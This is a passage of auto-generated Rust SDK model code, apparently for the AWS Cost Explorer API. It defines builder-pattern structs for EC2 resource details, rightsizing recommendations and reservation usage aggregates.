/// Creates a new builder-style object to manufacture [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
pub fn builder() -> crate::model::ebs_resource_utilization::Builder {
crate::model::ebs_resource_utilization::Builder::default()
}
}
/// <p>Details on the resource.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ResourceDetails {
/// <p>Details on the Amazon EC2 resource.</p>
pub ec2_resource_details: std::option::Option<crate::model::Ec2ResourceDetails>,
}
impl std::fmt::Debug for ResourceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ResourceDetails");
formatter.field("ec2_resource_details", &self.ec2_resource_details);
formatter.finish()
}
}
/// See [`ResourceDetails`](crate::model::ResourceDetails)
pub mod resource_details {
/// A builder for [`ResourceDetails`](crate::model::ResourceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) ec2_resource_details: std::option::Option<crate::model::Ec2ResourceDetails>,
}
impl Builder {
/// <p>Details on the Amazon EC2 resource.</p>
pub fn ec2_resource_details(mut self, input: crate::model::Ec2ResourceDetails) -> Self {
self.ec2_resource_details = Some(input);
self
}
pub fn set_ec2_resource_details(
mut self,
input: std::option::Option<crate::model::Ec2ResourceDetails>,
) -> Self {
self.ec2_resource_details = input;
self
}
/// Consumes the builder and constructs a [`ResourceDetails`](crate::model::ResourceDetails)
pub fn build(self) -> crate::model::ResourceDetails {
crate::model::ResourceDetails {
ec2_resource_details: self.ec2_resource_details,
}
}
}
}
impl ResourceDetails {
/// Creates a new builder-style object to manufacture [`ResourceDetails`](crate::model::ResourceDetails)
pub fn builder() -> crate::model::resource_details::Builder {
crate::model::resource_details::Builder::default()
}
}
/// <p>Details on the Amazon EC2 Resource.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2ResourceDetails {
/// <p>The hourly public On-Demand rate for the instance type.</p>
pub hourly_on_demand_rate: std::option::Option<std::string::String>,
/// <p>The type of Amazon Web Services instance.</p>
pub instance_type: std::option::Option<std::string::String>,
/// <p>The platform of the Amazon Web Services instance. The platform is the specific
/// combination of operating system, license model, and software on an instance.</p>
pub platform: std::option::Option<std::string::String>,
/// <p>The Amazon Web Services Region of the instance.</p>
pub region: std::option::Option<std::string::String>,
/// <p>The SKU of the product.</p>
pub sku: std::option::Option<std::string::String>,
/// <p>The memory capacity of the Amazon Web Services instance.</p>
pub memory: std::option::Option<std::string::String>,
/// <p>The network performance capacity of the Amazon Web Services instance.</p>
pub network_performance: std::option::Option<std::string::String>,
/// <p>The disk storage of the Amazon Web Services instance. This doesn't include EBS
/// storage.</p>
pub storage: std::option::Option<std::string::String>,
/// <p> The number of VCPU cores in the Amazon Web Services instance type.</p>
pub vcpu: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for Ec2ResourceDetails {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Ec2ResourceDetails");
formatter.field("hourly_on_demand_rate", &self.hourly_on_demand_rate);
formatter.field("instance_type", &self.instance_type);
formatter.field("platform", &self.platform);
formatter.field("region", &self.region);
formatter.field("sku", &self.sku);
formatter.field("memory", &self.memory);
formatter.field("network_performance", &self.network_performance);
formatter.field("storage", &self.storage);
formatter.field("vcpu", &self.vcpu);
formatter.finish()
}
}
/// See [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
pub mod ec2_resource_details {
/// A builder for [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) hourly_on_demand_rate: std::option::Option<std::string::String>,
pub(crate) instance_type: std::option::Option<std::string::String>,
pub(crate) platform: std::option::Option<std::string::String>,
pub(crate) region: std::option::Option<std::string::String>,
pub(crate) sku: std::option::Option<std::string::String>,
pub(crate) memory: std::option::Option<std::string::String>,
pub(crate) network_performance: std::option::Option<std::string::String>,
pub(crate) storage: std::option::Option<std::string::String>,
pub(crate) vcpu: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The hourly public On-Demand rate for the instance type.</p>
pub fn hourly_on_demand_rate(mut self, input: impl Into<std::string::String>) -> Self {
self.hourly_on_demand_rate = Some(input.into());
self
}
pub fn set_hourly_on_demand_rate(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.hourly_on_demand_rate = input;
self
}
/// <p>The type of Amazon Web Services instance.</p>
pub fn instance_type(mut self, input: impl Into<std::string::String>) -> Self {
self.instance_type = Some(input.into());
self
}
pub fn set_instance_type(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.instance_type = input;
self
}
/// <p>The platform of the Amazon Web Services instance. The platform is the specific
/// combination of operating system, license model, and software on an instance.</p>
pub fn platform(mut self, input: impl Into<std::string::String>) -> Self {
self.platform = Some(input.into());
self
}
pub fn set_platform(mut self, input: std::option::Option<std::string::String>) -> Self {
self.platform = input;
self
}
/// <p>The Amazon Web Services Region of the instance.</p>
pub fn region(mut self, input: impl Into<std::string::String>) -> Self {
self.region = Some(input.into());
self
}
pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
self.region = input;
self
}
/// <p>The SKU of the product.</p>
pub fn sku(mut self, input: impl Into<std::string::String>) -> Self {
self.sku = Some(input.into());
self
}
pub fn set_sku(mut self, input: std::option::Option<std::string::String>) -> Self {
self.sku = input;
self
}
/// <p>The memory capacity of the Amazon Web Services instance.</p>
pub fn memory(mut self, input: impl Into<std::string::String>) -> Self {
self.memory = Some(input.into());
self
}
pub fn set_memory(mut self, input: std::option::Option<std::string::String>) -> Self {
self.memory = input;
self
}
/// <p>The network performance capacity of the Amazon Web Services instance.</p>
pub fn network_performance(mut self, input: impl Into<std::string::String>) -> Self {
self.network_performance = Some(input.into());
self
}
pub fn set_network_performance(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.network_performance = input;
self
}
/// <p>The disk storage of the Amazon Web Services instance. This doesn't include EBS
/// storage.</p>
pub fn storage(mut self, input: impl Into<std::string::String>) -> Self {
self.storage = Some(input.into());
self
}
pub fn set_storage(mut self, input: std::option::Option<std::string::String>) -> Self {
self.storage = input;
self
}
/// <p> The number of VCPU cores in the Amazon Web Services instance type.</p>
pub fn vcpu(mut self, input: impl Into<std::string::String>) -> Self {
self.vcpu = Some(input.into());
self
}
pub fn set_vcpu(mut self, input: std::option::Option<std::string::String>) -> Self {
self.vcpu = input;
self
}
/// Consumes the builder and constructs a [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
pub fn build(self) -> crate::model::Ec2ResourceDetails {
crate::model::Ec2ResourceDetails {
hourly_on_demand_rate: self.hourly_on_demand_rate,
instance_type: self.instance_type,
platform: self.platform,
region: self.region,
sku: self.sku,
memory: self.memory,
network_performance: self.network_performance,
storage: self.storage,
vcpu: self.vcpu,
}
}
}
}
impl Ec2ResourceDetails {
/// Creates a new builder-style object to manufacture [`Ec2ResourceDetails`](crate::model::Ec2ResourceDetails)
pub fn builder() -> crate::model::ec2_resource_details::Builder {
crate::model::ec2_resource_details::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum RightsizingType {
Modify,
Terminate,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for RightsizingType {
fn from(s: &str) -> Self {
match s {
"MODIFY" => RightsizingType::Modify,
"TERMINATE" => RightsizingType::Terminate,
other => RightsizingType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for RightsizingType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(RightsizingType::from(s))
}
}
impl RightsizingType {
pub fn as_str(&self) -> &str {
match self {
RightsizingType::Modify => "MODIFY",
RightsizingType::Terminate => "TERMINATE",
RightsizingType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["MODIFY", "TERMINATE"]
}
}
impl AsRef<str> for RightsizingType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Context about the current instance.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CurrentInstance {
/// <p>Resource ID of the current instance.</p>
pub resource_id: std::option::Option<std::string::String>,
/// <p>The name that you given an instance. This field shows as blank if you haven't given
/// the instance a name.</p>
pub instance_name: std::option::Option<std::string::String>,
/// <p>Cost allocation resource tags that are applied to the instance.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::TagValues>>,
/// <p>Details about the resource and utilization.</p>
pub resource_details: std::option::Option<crate::model::ResourceDetails>,
/// <p>Utilization information of the current instance during the lookback period.</p>
pub resource_utilization: std::option::Option<crate::model::ResourceUtilization>,
/// <p> The number of hours during the lookback period that's covered by reservations.</p>
pub reservation_covered_hours_in_lookback_period: std::option::Option<std::string::String>,
/// <p>The number of hours during the lookback period that's covered by Savings Plans.</p>
pub savings_plans_covered_hours_in_lookback_period: std::option::Option<std::string::String>,
/// <p> The number of hours during the lookback period that's billed at On-Demand
/// rates.</p>
pub on_demand_hours_in_lookback_period: std::option::Option<std::string::String>,
/// <p>The total number of hours that the instance ran during the lookback period.</p>
pub total_running_hours_in_lookback_period: std::option::Option<std::string::String>,
/// <p>The current On-Demand cost of operating this instance on a monthly basis.</p>
pub monthly_cost: std::option::Option<std::string::String>,
/// <p> The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub currency_code: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CurrentInstance {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CurrentInstance");
formatter.field("resource_id", &self.resource_id);
formatter.field("instance_name", &self.instance_name);
formatter.field("tags", &self.tags);
formatter.field("resource_details", &self.resource_details);
formatter.field("resource_utilization", &self.resource_utilization);
formatter.field(
"reservation_covered_hours_in_lookback_period",
&self.reservation_covered_hours_in_lookback_period,
);
formatter.field(
"savings_plans_covered_hours_in_lookback_period",
&self.savings_plans_covered_hours_in_lookback_period,
);
formatter.field(
"on_demand_hours_in_lookback_period",
&self.on_demand_hours_in_lookback_period,
);
formatter.field(
"total_running_hours_in_lookback_period",
&self.total_running_hours_in_lookback_period,
);
formatter.field("monthly_cost", &self.monthly_cost);
formatter.field("currency_code", &self.currency_code);
formatter.finish()
}
}
/// See [`CurrentInstance`](crate::model::CurrentInstance)
pub mod current_instance {
/// A builder for [`CurrentInstance`](crate::model::CurrentInstance)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) resource_id: std::option::Option<std::string::String>,
pub(crate) instance_name: std::option::Option<std::string::String>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::TagValues>>,
pub(crate) resource_details: std::option::Option<crate::model::ResourceDetails>,
pub(crate) resource_utilization: std::option::Option<crate::model::ResourceUtilization>,
pub(crate) reservation_covered_hours_in_lookback_period:
std::option::Option<std::string::String>,
pub(crate) savings_plans_covered_hours_in_lookback_period:
std::option::Option<std::string::String>,
pub(crate) on_demand_hours_in_lookback_period: std::option::Option<std::string::String>,
pub(crate) total_running_hours_in_lookback_period: std::option::Option<std::string::String>,
pub(crate) monthly_cost: std::option::Option<std::string::String>,
pub(crate) currency_code: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>Resource ID of the current instance.</p>
pub fn resource_id(mut self, input: impl Into<std::string::String>) -> Self {
self.resource_id = Some(input.into());
self
}
pub fn set_resource_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.resource_id = input;
self
}
/// <p>The name that you given an instance. This field shows as blank if you haven't given
/// the instance a name.</p>
pub fn instance_name(mut self, input: impl Into<std::string::String>) -> Self {
self.instance_name = Some(input.into());
self
}
pub fn set_instance_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.instance_name = input;
self
}
pub fn tags(mut self, input: impl Into<crate::model::TagValues>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::TagValues>>,
) -> Self {
self.tags = input;
self
}
/// <p>Details about the resource and utilization.</p>
pub fn resource_details(mut self, input: crate::model::ResourceDetails) -> Self {
self.resource_details = Some(input);
self
}
pub fn set_resource_details(
mut self,
input: std::option::Option<crate::model::ResourceDetails>,
) -> Self {
self.resource_details = input;
self
}
/// <p>Utilization information of the current instance during the lookback period.</p>
pub fn resource_utilization(mut self, input: crate::model::ResourceUtilization) -> Self {
self.resource_utilization = Some(input);
self
}
pub fn set_resource_utilization(
mut self,
input: std::option::Option<crate::model::ResourceUtilization>,
) -> Self {
self.resource_utilization = input;
self
}
/// <p> The number of hours during the lookback period that's covered by reservations.</p>
pub fn reservation_covered_hours_in_lookback_period(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.reservation_covered_hours_in_lookback_period = Some(input.into());
self
}
pub fn set_reservation_covered_hours_in_lookback_period(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.reservation_covered_hours_in_lookback_period = input;
self
}
/// <p>The number of hours during the lookback period that's covered by Savings Plans.</p>
pub fn savings_plans_covered_hours_in_lookback_period(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.savings_plans_covered_hours_in_lookback_period = Some(input.into());
self
}
pub fn set_savings_plans_covered_hours_in_lookback_period(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.savings_plans_covered_hours_in_lookback_period = input;
self
}
/// <p> The number of hours during the lookback period that's billed at On-Demand
/// rates.</p>
pub fn on_demand_hours_in_lookback_period(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.on_demand_hours_in_lookback_period = Some(input.into());
self
}
pub fn set_on_demand_hours_in_lookback_period(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.on_demand_hours_in_lookback_period = input;
self
}
/// <p>The total number of hours that the instance ran during the lookback period.</p>
pub fn total_running_hours_in_lookback_period(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.total_running_hours_in_lookback_period = Some(input.into());
self
}
pub fn set_total_running_hours_in_lookback_period(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_running_hours_in_lookback_period = input;
self
}
/// <p>The current On-Demand cost of operating this instance on a monthly basis.</p>
pub fn monthly_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.monthly_cost = Some(input.into());
self
}
pub fn set_monthly_cost(mut self, input: std::option::Option<std::string::String>) -> Self {
self.monthly_cost = input;
self
}
/// <p> The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.currency_code = Some(input.into());
self
}
pub fn set_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.currency_code = input;
self
}
/// Consumes the builder and constructs a [`CurrentInstance`](crate::model::CurrentInstance)
pub fn build(self) -> crate::model::CurrentInstance {
crate::model::CurrentInstance {
resource_id: self.resource_id,
instance_name: self.instance_name,
tags: self.tags,
resource_details: self.resource_details,
resource_utilization: self.resource_utilization,
reservation_covered_hours_in_lookback_period: self
.reservation_covered_hours_in_lookback_period,
savings_plans_covered_hours_in_lookback_period: self
.savings_plans_covered_hours_in_lookback_period,
on_demand_hours_in_lookback_period: self.on_demand_hours_in_lookback_period,
total_running_hours_in_lookback_period: self.total_running_hours_in_lookback_period,
monthly_cost: self.monthly_cost,
currency_code: self.currency_code,
}
}
}
}
impl CurrentInstance {
/// Creates a new builder-style object to manufacture [`CurrentInstance`](crate::model::CurrentInstance)
pub fn builder() -> crate::model::current_instance::Builder {
crate::model::current_instance::Builder::default()
}
}
/// <p>The summary of rightsizing recommendations </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendationSummary {
/// <p>The total number of instance recommendations.</p>
pub total_recommendation_count: std::option::Option<std::string::String>,
/// <p>The estimated total savings resulting from modifications, on a monthly basis.</p>
pub estimated_total_monthly_savings_amount: std::option::Option<std::string::String>,
/// <p>The currency code that Amazon Web Services used to calculate the savings.</p>
pub savings_currency_code: std::option::Option<std::string::String>,
/// <p> The savings percentage based on the recommended modifications. It's relative to the
/// total On-Demand costs that are associated with these instances.</p>
pub savings_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for RightsizingRecommendationSummary {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("RightsizingRecommendationSummary");
formatter.field(
"total_recommendation_count",
&self.total_recommendation_count,
);
formatter.field(
"estimated_total_monthly_savings_amount",
&self.estimated_total_monthly_savings_amount,
);
formatter.field("savings_currency_code", &self.savings_currency_code);
formatter.field("savings_percentage", &self.savings_percentage);
formatter.finish()
}
}
/// See [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
pub mod rightsizing_recommendation_summary {
/// A builder for [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) total_recommendation_count: std::option::Option<std::string::String>,
pub(crate) estimated_total_monthly_savings_amount: std::option::Option<std::string::String>,
pub(crate) savings_currency_code: std::option::Option<std::string::String>,
pub(crate) savings_percentage: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The total number of instance recommendations.</p>
pub fn total_recommendation_count(mut self, input: impl Into<std::string::String>) -> Self {
self.total_recommendation_count = Some(input.into());
self
}
pub fn set_total_recommendation_count(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_recommendation_count = input;
self
}
/// <p>The estimated total savings resulting from modifications, on a monthly basis.</p>
pub fn estimated_total_monthly_savings_amount(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.estimated_total_monthly_savings_amount = Some(input.into());
self
}
pub fn set_estimated_total_monthly_savings_amount(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_total_monthly_savings_amount = input;
self
}
/// <p>The currency code that Amazon Web Services used to calculate the savings.</p>
pub fn savings_currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.savings_currency_code = Some(input.into());
self
}
pub fn set_savings_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.savings_currency_code = input;
self
}
/// <p> The savings percentage based on the recommended modifications. It's relative to the
/// total On-Demand costs that are associated with these instances.</p>
pub fn savings_percentage(mut self, input: impl Into<std::string::String>) -> Self {
self.savings_percentage = Some(input.into());
self
}
pub fn set_savings_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.savings_percentage = input;
self
}
/// Consumes the builder and constructs a [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
pub fn build(self) -> crate::model::RightsizingRecommendationSummary {
crate::model::RightsizingRecommendationSummary {
total_recommendation_count: self.total_recommendation_count,
estimated_total_monthly_savings_amount: self.estimated_total_monthly_savings_amount,
savings_currency_code: self.savings_currency_code,
savings_percentage: self.savings_percentage,
}
}
}
}
impl RightsizingRecommendationSummary {
/// Creates a new builder-style object to manufacture [`RightsizingRecommendationSummary`](crate::model::RightsizingRecommendationSummary)
pub fn builder() -> crate::model::rightsizing_recommendation_summary::Builder {
crate::model::rightsizing_recommendation_summary::Builder::default()
}
}
/// <p>Metadata for this recommendation set.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendationMetadata {
/// <p>The ID for this specific recommendation.</p>
pub recommendation_id: std::option::Option<std::string::String>,
/// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
pub generation_timestamp: std::option::Option<std::string::String>,
/// <p>The number of days of previous usage that Amazon Web Services considers when making
/// this recommendation.</p>
pub lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
/// <p>Additional metadata that might be applicable to the recommendation.</p>
pub additional_metadata: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for RightsizingRecommendationMetadata {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("RightsizingRecommendationMetadata");
formatter.field("recommendation_id", &self.recommendation_id);
formatter.field("generation_timestamp", &self.generation_timestamp);
formatter.field("lookback_period_in_days", &self.lookback_period_in_days);
formatter.field("additional_metadata", &self.additional_metadata);
formatter.finish()
}
}
/// See [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
pub mod rightsizing_recommendation_metadata {
/// A builder for [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) recommendation_id: std::option::Option<std::string::String>,
pub(crate) generation_timestamp: std::option::Option<std::string::String>,
pub(crate) lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
pub(crate) additional_metadata: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The ID for this specific recommendation.</p>
pub fn recommendation_id(mut self, input: impl Into<std::string::String>) -> Self {
self.recommendation_id = Some(input.into());
self
}
pub fn set_recommendation_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.recommendation_id = input;
self
}
/// <p>The timestamp for when Amazon Web Services made this recommendation.</p>
pub fn generation_timestamp(mut self, input: impl Into<std::string::String>) -> Self {
self.generation_timestamp = Some(input.into());
self
}
pub fn set_generation_timestamp(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.generation_timestamp = input;
self
}
/// <p>The number of days of previous usage that Amazon Web Services considers when making
/// this recommendation.</p>
pub fn lookback_period_in_days(
mut self,
input: crate::model::LookbackPeriodInDays,
) -> Self {
self.lookback_period_in_days = Some(input);
self
}
pub fn set_lookback_period_in_days(
mut self,
input: std::option::Option<crate::model::LookbackPeriodInDays>,
) -> Self {
self.lookback_period_in_days = input;
self
}
/// <p>Additional metadata that might be applicable to the recommendation.</p>
pub fn additional_metadata(mut self, input: impl Into<std::string::String>) -> Self {
self.additional_metadata = Some(input.into());
self
}
pub fn set_additional_metadata(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.additional_metadata = input;
self
}
/// Consumes the builder and constructs a [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
pub fn build(self) -> crate::model::RightsizingRecommendationMetadata {
crate::model::RightsizingRecommendationMetadata {
recommendation_id: self.recommendation_id,
generation_timestamp: self.generation_timestamp,
lookback_period_in_days: self.lookback_period_in_days,
additional_metadata: self.additional_metadata,
}
}
}
}
impl RightsizingRecommendationMetadata {
/// Creates a new builder-style object to manufacture [`RightsizingRecommendationMetadata`](crate::model::RightsizingRecommendationMetadata)
pub fn builder() -> crate::model::rightsizing_recommendation_metadata::Builder {
crate::model::rightsizing_recommendation_metadata::Builder::default()
}
}
/// <p>The aggregated numbers for your reservation usage.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationAggregates {
/// <p>The percentage of reservation time that you used.</p>
pub utilization_percentage: std::option::Option<std::string::String>,
/// <p>The percentage of Amazon EC2 reservation time that you used. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub utilization_percentage_in_units: std::option::Option<std::string::String>,
/// <p>How many reservation hours that you purchased.</p>
pub purchased_hours: std::option::Option<std::string::String>,
/// <p>The number of Amazon EC2 reservation hours that you purchased. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub purchased_units: std::option::Option<std::string::String>,
/// <p>The total number of reservation hours that you used.</p>
pub total_actual_hours: std::option::Option<std::string::String>,
/// <p>The total number of Amazon EC2 reservation hours that you used. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub total_actual_units: std::option::Option<std::string::String>,
/// <p>The number of reservation hours that you didn't use.</p>
pub unused_hours: std::option::Option<std::string::String>,
/// <p>The number of Amazon EC2 reservation hours that you didn't use. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub unused_units: std::option::Option<std::string::String>,
/// <p>How much your reservation costs if charged On-Demand rates.</p>
pub on_demand_cost_of_ri_hours_used: std::option::Option<std::string::String>,
/// <p>How much you saved due to purchasing and utilizing reservation. Amazon Web Services
/// calculates this by subtracting <code>TotalAmortizedFee</code> from
/// <code>OnDemandCostOfRIHoursUsed</code>.</p>
pub net_ri_savings: std::option::Option<std::string::String>,
/// <p>How much you might save if you use your entire reservation.</p>
pub total_potential_ri_savings: std::option::Option<std::string::String>,
/// <p>The upfront cost of your reservation. It's amortized over the reservation
/// period.</p>
pub amortized_upfront_fee: std::option::Option<std::string::String>,
/// <p>The monthly cost of your reservation. It's amortized over the reservation
/// period.</p>
pub amortized_recurring_fee: std::option::Option<std::string::String>,
/// <p>The total cost of your reservation. It's amortized over the reservation period.</p>
pub total_amortized_fee: std::option::Option<std::string::String>,
/// <p>The cost of unused hours for your reservation.</p>
pub ri_cost_for_unused_hours: std::option::Option<std::string::String>,
/// <p>The realized savings because of purchasing and using a reservation.</p>
pub realized_savings: std::option::Option<std::string::String>,
/// <p>The unrealized savings because of purchasing and using a reservation.</p>
pub unrealized_savings: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationAggregates {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ReservationAggregates");
formatter.field("utilization_percentage", &self.utilization_percentage);
formatter.field(
"utilization_percentage_in_units",
&self.utilization_percentage_in_units,
);
formatter.field("purchased_hours", &self.purchased_hours);
formatter.field("purchased_units", &self.purchased_units);
formatter.field("total_actual_hours", &self.total_actual_hours);
formatter.field("total_actual_units", &self.total_actual_units);
formatter.field("unused_hours", &self.unused_hours);
formatter.field("unused_units", &self.unused_units);
formatter.field(
"on_demand_cost_of_ri_hours_used",
&self.on_demand_cost_of_ri_hours_used,
);
formatter.field("net_ri_savings", &self.net_ri_savings);
formatter.field(
"total_potential_ri_savings",
&self.total_potential_ri_savings,
);
formatter.field("amortized_upfront_fee", &self.amortized_upfront_fee);
formatter.field("amortized_recurring_fee", &self.amortized_recurring_fee);
formatter.field("total_amortized_fee", &self.total_amortized_fee);
formatter.field("ri_cost_for_unused_hours", &self.ri_cost_for_unused_hours);
formatter.field("realized_savings", &self.realized_savings);
formatter.field("unrealized_savings", &self.unrealized_savings);
formatter.finish()
}
}
/// See [`ReservationAggregates`](crate::model::ReservationAggregates)
pub mod reservation_aggregates {
/// A builder for [`ReservationAggregates`](crate::model::ReservationAggregates)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) utilization_percentage: std::option::Option<std::string::String>,
pub(crate) utilization_percentage_in_units: std::option::Option<std::string::String>,
pub(crate) purchased_hours: std::option::Option<std::string::String>,
pub(crate) purchased_units: std::option::Option<std::string::String>,
pub(crate) total_actual_hours: std::option::Option<std::string::String>,
pub(crate) total_actual_units: std::option::Option<std::string::String>,
pub(crate) unused_hours: std::option::Option<std::string::String>,
pub(crate) unused_units: std::option::Option<std::string::String>,
pub(crate) on_demand_cost_of_ri_hours_used: std::option::Option<std::string::String>,
pub(crate) net_ri_savings: std::option::Option<std::string::String>,
pub(crate) total_potential_ri_savings: std::option::Option<std::string::String>,
pub(crate) amortized_upfront_fee: std::option::Option<std::string::String>,
pub(crate) amortized_recurring_fee: std::option::Option<std::string::String>,
pub(crate) total_amortized_fee: std::option::Option<std::string::String>,
pub(crate) ri_cost_for_unused_hours: std::option::Option<std::string::String>,
pub(crate) realized_savings: std::option::Option<std::string::String>,
pub(crate) unrealized_savings: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The percentage of reservation time that you used.</p>
pub fn utilization_percentage(mut self, input: impl Into<std::string::String>) -> Self {
self.utilization_percentage = Some(input.into());
self
}
pub fn set_utilization_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.utilization_percentage = input;
self
}
/// <p>The percentage of Amazon EC2 reservation time that you used. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub fn utilization_percentage_in_units(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.utilization_percentage_in_units = Some(input.into());
self
}
pub fn set_utilization_percentage_in_units(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.utilization_percentage_in_units = input;
self
}
/// <p>How many reservation hours that you purchased.</p>
pub fn purchased_hours(mut self, input: impl Into<std::string::String>) -> Self {
self.purchased_hours = Some(input.into());
self
}
pub fn set_purchased_hours(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.purchased_hours = input;
self
}
/// <p>The number of Amazon EC2 reservation hours that you purchased. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub fn purchased_units(mut self, input: impl Into<std::string::String>) -> Self {
self.purchased_units = Some(input.into());
self
}
pub fn set_purchased_units(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.purchased_units = input;
self
}
/// <p>The total number of reservation hours that you used.</p>
pub fn total_actual_hours(mut self, input: impl Into<std::string::String>) -> Self {
self.total_actual_hours = Some(input.into());
self
}
pub fn set_total_actual_hours(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_actual_hours = input;
self
}
